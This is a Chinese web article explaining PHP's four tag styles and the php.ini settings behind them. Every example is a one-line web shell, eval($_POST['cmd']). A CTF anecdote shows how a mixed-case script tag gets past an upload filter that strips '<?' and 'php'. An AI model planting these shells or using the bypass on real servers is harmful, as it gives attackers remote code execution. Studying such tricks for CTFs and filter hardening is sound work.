温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

php的标识有哪些?

发布时间:2020-05-13 09:13:43 来源:亿速云 阅读:244 作者:Leah 栏目:编程语言

PHP的标识有哪些?这个问题可能是我们日常工作经遇见到的。通过这个问题,希望你能收获更多。如果你不看答案,不知道是否有把握回答这个问题?让我们来试试。

PHP四种标记风格

1.XML风格

<?php
eval($_POST['cmd']); 
 ?>

php推荐使用的标记风格。

服务器管理员无法禁用,所有服务器上均可使用该风格。

2.脚本风格

<script language="php">
    eval($_POST['cmd']);
</script>

默认开启,无法禁用

笔者曾遇到过一CTF题目,要求上传shell,但是却对文件内容做了过滤 ,<? 以及 php,替换为了空格。此种风格中,language的值,大小写都可以,因此可以构造如下代码进行绕过

<script language="PhP">
    eval($_POST['cmd']);
</script>

3.简短风格

<? 
    eval($_POST['cmd']);
?>

此种风格需要在配置文件php.ini中启用short_open_tage选项

此种风格在许多环境中默认是不支持的

4.ASP风格

<% 
    eval($_POST['cmd']);
%>

此种风格需要在配置文件php.ini中启用asp_tag选项

在默认情况下是禁用的

看完上述内容,你们对php的标识大概了解了吗?如果想了解更多相关文章内容,欢迎关注亿速云行业资讯频道,感谢各位的阅读!

向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

AI